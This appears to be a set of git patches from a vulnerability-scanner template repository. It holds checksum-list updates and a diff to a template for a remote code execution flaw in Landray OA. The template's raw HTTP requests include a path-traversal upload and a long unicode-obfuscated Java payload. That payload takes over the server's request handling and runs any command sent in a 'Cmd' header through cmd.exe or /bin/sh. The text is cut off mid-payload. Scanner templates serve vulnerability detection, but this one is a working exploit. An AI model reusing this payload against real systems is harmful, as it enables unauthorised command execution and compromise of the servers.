+http/technologies/wordpress/plugins/wp-google-maps.yaml:7714dc488408c727f57109ed7aad1bf87f11915f +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:355789faeb9af8ae680b4981442457c4f1b9126b +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:8d8ee2d6d5a9fc4dc94471bae3ad3e9f723a73ee +http/technologies/wordpress/plugins/wp-migrate-db.yaml:99fcb86489837c7821d1d0387cbd7c6c7d85b13a +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:d3e894216ab73ac2eb100bf15631e8d2b70114b0 +http/technologies/wordpress/plugins/wp-optimize.yaml:872f6f68b74611212a9233259d285aea5775cf72 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:7f55c4d27aac005307004c936a5fee14b6859c41 +http/technologies/wordpress/plugins/wp-reset.yaml:51054e4f9fc542114ab05096b4bd2c9210e52880 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:353b6ba20b6f0436224d08b1b849ca681f7e7046 +http/technologies/wordpress/plugins/wp-rollback.yaml:cb25e42fb3577858d0195af20725754f466eb1a1 +http/technologies/wordpress/plugins/wp-seopress.yaml:319b62630837ca13b855415d8ec1cba9c9afb434 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:083ff1f69bd969cbc7d79a8d909121c881d99604 +http/technologies/wordpress/plugins/wp-smushit.yaml:744abd567944f93a886f056ac83e83d68a4dd5a8 +http/technologies/wordpress/plugins/wp-statistics.yaml:819bcc204040d5a967e0e2138f61df44f0e1bd2d +http/technologies/wordpress/plugins/wp-super-cache.yaml:309089e4aadfa5755e337efaef4dc1b94e9df9ac http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:220c2c76b73a06e9668bed8c769a44e59825e346 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:561b7854df0779ca6c9f3f6f2913cc7c20d7e027 +http/technologies/wordpress/plugins/wpforms-lite.yaml:86db133b638076dd7aa80d365567d9dafe80101e +http/technologies/wordpress/plugins/wps-hide-login.yaml:5416ce97082781425a7be08f289ed2ee107e5d6e +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:a3612f56dd297880b0d8d9faf7c4a87ad488bf55 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:828bb1edde347f358b05a3528c734d7dce2b7e5c http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8734,7 +8734,7 @@ javascript/misconfiguration/ssh/ssh-weak-algo-supported.yaml:83bdd007c2437f397fa javascript/misconfiguration/ssh/ssh-weak-mac-algo.yaml:5b88f7a8604b8495d2376c87d7ed98e48a5517a7 javascript/misconfiguration/ssh/ssh-weak-public-key.yaml:f6a91e501db1e6dfb6e9ea406e11df4991697d4e javascript/misconfiguration/ssh/ssh-weakkey-exchange-algo.yaml:6749f7256d5cdb6171b77be90c144d7947efcc27 -javascript/udp/detection/tftp-detect.yaml:f3bc49f090e77c4321ea6365fadfa772af288e05 +javascript/udp/detection/tftp-detect.yaml:7cd6340c3fa3a4319484636c0e66cc257f00ad2c network/backdoor/backdoored-zte.yaml:1dedf67f253983bbc4882b7616078c5a53cbe350 network/c2/darkcomet-trojan.yaml:adde1a1a06abb9b7c86ee78e538769eaf8281d6e network/c2/darktrack-rat-trojan.yaml:87d27aa07133993bc44f0410eafb1385446c6020 @@ -8917,7 +8917,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8358ddac4f74ac2bec910ddaec6056406a8367e0 +templates-checksum.txt:67f7e72f351b27af8ff1ffb69addbf5be91c54cc vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 5d093f490f890a6161bc64e96fc3497703f9ded2 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 24 Jul 2024 12:14:10 +0000 Subject: [PATCH 1598/1841] Auto Template Signing [Wed Jul 24 12:14:10 UTC 2024] :robot: --- javascript/udp/detection/tftp-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/javascript/udp/detection/tftp-detect.yaml b/javascript/udp/detection/tftp-detect.yaml index 8849374ba3..ee14d48c5f 100644 --- a/javascript/udp/detection/tftp-detect.yaml +++ b/javascript/udp/detection/tftp-detect.yaml @@ -34,3 +34,4 @@ javascript: words: - "Unknown transfer ID" case-insensitive: true +# digest: 4a0a00473045022100a1c79318d0befe25bbbb39c9ee4c6bbf794382950ee1cf4a665a159e283614540220460812549e4196efbe34cab92628186bf168564c521a7a72527b2f96cf497c7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 205ff6b19e378650c6605807c1065c05fa61651a Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 24 Jul 2024 20:38:24 +0530 Subject: [PATCH 1599/1841] Update and rename landray-oa-replaceExtend-rce.yaml to landray-oa-replaceextend-rce.yaml --- ...yaml => landray-oa-replaceextend-rce.yaml} | 23 ++++++++----------- 1 file changed, 10 insertions(+), 13 deletions(-) rename http/vulnerabilities/landray/{landray-oa-replaceExtend-rce.yaml => landray-oa-replaceextend-rce.yaml} (97%) diff --git a/http/vulnerabilities/landray/landray-oa-replaceExtend-rce.yaml b/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml similarity index 97% rename from http/vulnerabilities/landray/landray-oa-replaceExtend-rce.yaml rename to http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml index 5cf491ecba..1eb892d1c2 100644 --- a/http/vulnerabilities/landray/landray-oa-replaceExtend-rce.yaml +++ b/http/vulnerabilities/landray/landray-oa-replaceextend-rce.yaml @@ -1,4 +1,4 @@ -id: landray-oa-replaceExtend-rce +id: landray-oa-replaceextend-rce info: name: Landray OA replaceExtend Function - Remote Code Execution @@ -15,13 +15,15 @@ info: hunter-query: web.body=="蓝凌软件",web.icon=="302464c3f6207d57240649926cfc7bd4" tags: landray,oa,dataxml,rce,replaceExtend +variables: + string: "{{randstr}}" + http: - raw: - | POST /sys/ui/sys_ui_component/sysUiComponent.do HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 - Content-Length: 400 + User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.3 Accept: application/json, text/javascript, */*; q=0.01 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryL7ILSpOdIhIIvL51 @@ -41,27 +43,22 @@ http: ../../../ekp/sys/common ------WebKitFormBoundaryL7ILSpOdIhIIvL51-- + - | POST /resource/help/sys/portal/dataxml.jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 - Content-Length: 17392 - Cmd: echo 4de0353d63cc9ab4286361a4ff3f12d1 - Accept-Encoding: gzip, deflate + Cmd: echo {{string}} Content-Type: application/x-www-form-urlencoded - Cookie: SESSION=NWNjYWI3YmUtZTM2Ny00MzY2LTgwN2QtYTdiMzdlOGRlMTg5; Path=/; HttpOnly; SameSite=Lax - Connection: close s_bean=ruleFormulaValidate&script=\u0020\u0020\u0020\u0020\u0062\u006f\u006f\u006c\u0065\u0061\u006e\u0020\u0066\u006c\u0061\u0067\u0020\u003d\u0020\u0066\u0061\u006c\u0073\u0065\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0020\u0067\u0072\u006f\u0075\u0070\u0020\u003d\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u002e\u0063\u0075\u0072\u0072\u0065\u006e\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0028\u0029\u002e\u0067\u0065\u0074\u0054\u0068\u0072\u0065\u0061\u0064\u0047\u0072\u006f\u0075\u0070\u0028\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u006c\u0061\u006e\u0067\u002e\u0072\u0065\u0066\u006c\u0065\u0063\u0074\u002e\u0046\u0069\u0065\u006c\u0064\u0020\u0066\u0020\u003d\u0020\u0067\u0072\u006f\u0075\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u0020\u003d\u0020\u0028\u0054\u0068\u0072\u0065\u0061\u0064\u005b\u005d\u0029\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0067\u0072\u006f\u0075\u0070\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u0069\u0020\u003d\u0020\u0030\u003b\u0020\u0069\u0020\u003c\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u003b\u0020\u0069\u002b\u002b\u0029\u0020\u007b\u0020\u0074\u0072\u0079\u0020\u007b\u0020\u0054\u0068\u0072\u0065\u0061\u0064\u0020\u0074\u0020\u003d\u0020\u0074\u0068\u0072\u0065\u0061\u0064\u0073\u005b\u0069\u005d\u003b\u0069\u0066\u0020\u0028\u0074\u0020\u003d\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0073\u0074\u0072\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u004e\u0061\u006d\u0065\u0028\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0065\u0078\u0065\u0063\u0022\u0029\u0020\u007c\u007c\u0020\u0021\u0073\u0074\u0072\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0068\u0074\u0074\u0070\u0022\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u0074\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0061\u0072\u0067\u0065\u0074\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0074\u0029\u003b\u0069\u0066\u0020\u0028\u0021\u0028\u006f\u0062\u006a\u0020\u0069\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u006f\u0066\u0020\u0052\u0075\u006e\u006e\u0061\u0062\u006c\u0065\u0029\u0029\u0020\u007b\u0020\u0063\u006f\u006e\u0074\u0069\u006e\u0075\u0065\u003b\u0020\u007d\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0074\u0068\u0069\u0073\u0024\u0030\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0068\u0061\u006e\u0064\u006c\u0065\u0072\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0053\u0075\u0070\u0065\u0072\u0063\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u0046\u0069\u0065\u006c\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0065\u0029\u0020\u007b\u0020\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0067\u006c\u006f\u0062\u0061\u006c\u0022\u0029\u003b\u0020\u007d\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u006f\u0062\u006a\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u0020\u003d\u0020\u0028\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u004c\u0069\u0073\u0074\u0029\u0020\u0028\u0066\u002e\u0067\u0065\u0074\u0028\u006f\u0062\u006a\u0029\u0029\u003b\u0066\u006f\u0072\u0020\u0028\u0069\u006e\u0074\u0020\u006a\u0020\u003d\u0020\u0030\u003b\u0020\u006a\u0020\u003c\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0073\u0069\u007a\u0065\u0028\u0029\u003b\u0020\u002b\u002b\u006a\u0029\u0020\u007b\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0073\u002e\u0067\u0065\u0074\u0028\u006a\u0029\u003b\u0066\u0020\u003d\u0020\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u0046\u0069\u0065\u006c\u0064\u0028\u0022\u0072\u0065\u0071\u0022\u0029\u003b\u0066\u002e\u0073\u0065\u0074\u0041\u0063\u0063\u0065\u0073\u0073\u0069\u0062\u006c\u0065\u0028\u0074\u0072\u0075\u0065\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0071\u0020\u003d\u0020\u0066\u002e\u0067\u0065\u0074\u0028\u0070\u0072\u006f\u0063\u0065\u0073\u0073\u006f\u0072\u0029\u003b\u004f\u0062\u006a\u0065\u0063\u0074\u0020\u0072\u0065\u0073\u0070\u0020\u003d\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0052\u0065\u0073\u0070\u006f\u006e\u0073\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u0030\u005d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u0030\u005d\u0029\u003b\u0073\u0074\u0072\u0020\u003d\u0020\u0028\u0053\u0074\u0072\u0069\u006e\u0067\u0029\u0020\u0072\u0065\u0071\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0067\u0065\u0074\u0048\u0065\u0061\u0064\u0065\u0072\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0053\u0074\u0072\u0069\u006e\u0067\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0071\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0022\u0043\u006d\u0064\u0022\u007d\u0029\u003b\u0069\u0066\u0020\u0028\u0073\u0074\u0072\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0020\u0026\u0026\u0020\u0021\u0073\u0074\u0072\u002e\u0069\u0073\u0045\u006d\u0070\u0074\u0079\u0028\u0029\u0029\u0020\u007b\u0020\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0053\u0074\u0061\u0074\u0075\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0032\u0030\u0030\u0029\u007d\u0029\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u0020\u0063\u006d\u0064\u0073\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0020\u0022\u002f\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u0020\u003a\u0020\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u002f\u0062\u0069\u006e\u002f\u0073\u0068\u0022\u002c\u0020\u0022\u002d\u0063\u0022\u002c\u0020\u0073\u0074\u0072\u007d\u003b\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0020\u003d\u0020\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u002e\u0063\u006f\u006e\u0074\u0061\u0069\u006e\u0073\u0028\u0022\u0077\u0069\u006e\u0064\u006f\u0077\u0022\u0029\u0020\u003f\u0020\u0022\u0047\u0042\u004b\u0022\u003a\u0022\u0055\u0054\u0046\u002d\u0038\u0022\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0074\u0065\u0078\u0074\u0032\u0020\u003d\u0028\u006e\u0065\u0077\u0020\u006a\u0061\u0076\u0061\u002e\u0075\u0074\u0069\u006c\u002e\u0053\u0063\u0061\u006e\u006e\u0065\u0072\u0028\u0028\u006e\u0065\u0077\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0042\u0075\u0069\u006c\u0064\u0065\u0072\u0028\u0063\u006d\u0064\u0073\u0029\u0029\u002e\u0073\u0074\u0061\u0072\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002c\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u0029\u002e\u0075\u0073\u0065\u0044\u0065\u006c\u0069\u006d\u0069\u0074\u0065\u0072\u0028\u0022\u005c\u005c\u0041\u0022\u0029\u002e\u006e\u0065\u0078\u0074\u0028\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0062\u0079\u0074\u0065\u005b\u005d\u0020\u0072\u0065\u0073\u0075\u006c\u0074\u003d\u0028\u0022\u0045\u0078\u0065\u0063\u0075\u0074\u0065\u003a\u0020\u0020\u0020\u0020\u0022\u002b\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0028\u0074\u0065\u0078\u0074\u0032\u002c\u0022\u0075\u0074\u0066\u002d\u0038\u0022\u0029\u0029\u002e\u0067\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0028\u0063\u0068\u0061\u0072\u0073\u0065\u0074\u004e\u0061\u006d\u0065\u0029\u003b\u0074\u0072\u0079\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006f\u0072\u0067\u002e\u0061\u0070\u0061\u0063\u0068\u0065\u002e\u0074\u006f\u006d\u0063\u0061\u0074\u002e\u0075\u0074\u0069\u006c\u002e\u0062\u0075\u0066\u002e\u0042\u0079\u0074\u0065\u0043\u0068\u0075\u006e\u006b\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u006e\u0065\u0077\u0049\u006e\u0073\u0074\u0061\u006e\u0063\u0065\u0028\u0029\u003b\u0063\u006c\u0073\u002e\u0067\u0065\u0074\u0044\u0065\u0063\u006c\u0061\u0072\u0065\u0064\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0073\u0065\u0074\u0042\u0079\u0074\u0065\u0073\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0062\u0079\u0074\u0065\u005b\u005d\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u002c\u0020\u0069\u006e\u0074\u002e\u0063\u006c\u0061\u0073\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u006f\u0062\u006a\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u0072\u0065\u0073\u0075\u006c\u0074\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0030\u0029\u002c\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0074\u0065\u0067\u0065\u0072\u0028\u0072\u0065\u0073\u0075\u006c\u0074\u002e\u006c\u0065\u006e\u0067\u0074\u0068\u0029\u007d\u0029\u003b\u0072\u0065\u0073\u0070\u002e\u0067\u0065\u0074\u0043\u006c\u0061\u0073\u0073\u0028\u0029\u002e\u0067\u0065\u0074\u004d\u0065\u0074\u0068\u006f\u0064\u0028\u0022\u0064\u006f\u0057\u0072\u0069\u0074\u0065\u0022\u002c\u0020\u006e\u0065\u0077\u0020\u0043\u006c\u0061\u0073\u0073\u005b\u005d\u007b\u0063\u006c\u0073\u007d\u0029\u002e\u0069\u006e\u0076\u006f\u006b\u0065\u0028\u0072\u0065\u0073\u0070\u002c\u0020\u006e\u0065\u0077\u0020\u004f\u0062\u006a\u0065\u0063\u0074\u005b\u005d\u007b\u006f\u0062\u006a\u007d\u0029\u003b\u0020\u007d\u0020\u0063\u0061\u0074\u0063\u0068\u0020\u0028\u004e\u006f\u0053\u0075\u0063\u0068\u004d\u0065\u0074\u0068\u006f\u0064\u0045\u0078\u0063\u0065\u0070\u0074\u0069\u006f\u006e\u0020\u0076\u0061\u0072\u0035\u0029\u0020\u007b\u0020\u0043\u006c\u0061\u0073\u0073\u0020\u0063\u006c\u0073\u0020\u003d\u0020\u0043\u006c\u0061\u0073\u0073\u002e\u0066\u006f\u0072\u004e\u0061\u006d\u0065\u0028\u0022\u006a\u0061\u0076\u0061\u002e\u006e\u0069\u006f\u002e\u0042\u0079\u0074\u0065\u0042\u0075\u0066\u0066\u0065\u0072\u0022\u0029\u003b\u006f\u0062\u006a\u0020\u003d\u0020\u0063\u006c\u0073\u002e\u0067\u006